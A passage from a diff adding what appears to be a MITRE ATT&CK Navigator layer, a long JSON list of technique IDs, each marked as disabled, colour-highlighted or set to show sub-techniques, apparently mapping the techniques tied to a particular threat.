+            "enabled": false,
+            "techniqueID": "T1036.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1038"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1039"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1040"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1041"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1042"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1043"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1044"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1045"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1046"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1047"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1049"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1050"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1051"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1053"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1053.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1054"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1056"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1056.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1057"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1058"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1060"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1061"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1062"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1063"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1064"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1065"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1066"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1067"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1068"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1070"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1070.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.009"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1072"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1073"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1075"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1076"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1077"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1079"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1080"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1081"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1082"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1083"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1084"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1085"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1086"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1088"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1089"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1091"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1092"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1093"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1094"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1095"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1096"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1097"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1098"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1098.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1099"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1100"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1101"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1102"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1102.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1103"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1104"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1105"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1106"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1107"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1108"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1109"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1110"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1110.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1111"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1112"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1113"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1115"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1116"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1117"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1118"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1119"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1120"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1121"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1122"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1123"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1124"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1125"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1126"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1128"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1129"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1130"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1131"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1133"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1135"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1138"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1139"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1140"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1141"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1142"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1143"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1144"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1145"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1146"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1147"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1148"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1149"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1150"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1151"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1152"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1153"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1154"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1155"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1156"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1157"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1158"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1159"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1160"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1161"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1162"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1163"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1164"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1165"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1166"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1167"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1168"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1169"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1170"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1171"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1172"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1173"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1174"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1175"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1176"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1177"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1178"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1179"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1180"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1181"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1182"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1183"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1184"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1185"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1186"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1187"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1188"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1189"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1190"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1191"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1192"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1193"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1194"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1196"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1197"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1198"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1199"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1200"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1201"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1202"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1203"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1206"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1207"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1208"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1209"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1210"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1211"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1212"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1214"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1215"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1217"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1218"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.010"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1218.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.014"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1219"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1220"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1221"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1223"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1482"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1483"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1485"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1486"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1487"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1488"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1489"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1490"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1492"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1493"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1494"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1495"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1496"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1500"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1501"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1502"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1503"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1504"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1506"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1514"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1519"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1522"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1525"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1526"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1527"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1528"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1529"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1530"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1531"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1534"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1535"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1536"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1537"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1538"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1539"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.005"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1543"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1543.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.016"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1548"
+        },
+        {
+            "enabled": false,
